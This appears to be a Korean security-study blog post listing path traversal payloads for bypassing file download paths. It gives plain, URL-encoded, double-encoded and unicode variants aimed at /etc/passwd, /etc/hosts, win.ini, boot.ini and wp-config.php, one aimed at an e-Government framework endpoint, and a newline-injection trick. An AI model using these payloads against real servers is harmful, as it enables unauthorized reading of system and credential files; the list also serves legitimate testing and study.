* 파일 다운로드 경로 우회
1) 파일 다운로드 경로
../../../../etc/passwd
../../../../etc/hosts
../../../../winnt/win.ini
../../../../boot.ini
../../../../wp-config.php
2) 인코딩
../../../../etc/passwd
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
../../../../../../../../../etc/hosts
인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73
더블 인코딩 %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fhosts
3) 전자정부 표준프레임워크 사용
imageSrc.do?path=/....//....//....//....//....//....//....//....//....//....//etc/&physical=passwd
4) 그 외
passwd %70%61%73%73%77%64
16bit 유니코드인코딩 .(%u002e), /(%u2215), \(%u2216)
더블URL 인코딩 .(%252e), /(%252f), \(%255c)
유닉스 ../../../../etc/passwd%0a.jpg > 개행문자(%0a)를 삽입 가능
'보안 공부 > Web 보안' 카테고리의 다른 글
| HTTP 불필요한 웹 메서드 차단 방법 (0) | 2019.05.21 |
|---|---|
| 서버버전 노출 대응방안 모음 (0) | 2019.01.02 |
| XSS (크로스사이트 스크립트, 크로스 사이트 스크립팅) 취약점 (3) | 2018.12.15 |
| HTTP 에러코드 (0) | 2018.12.06 |
| TRACE와 XST(Cross-site Tracing) 공격 (0) | 2018.11.14 |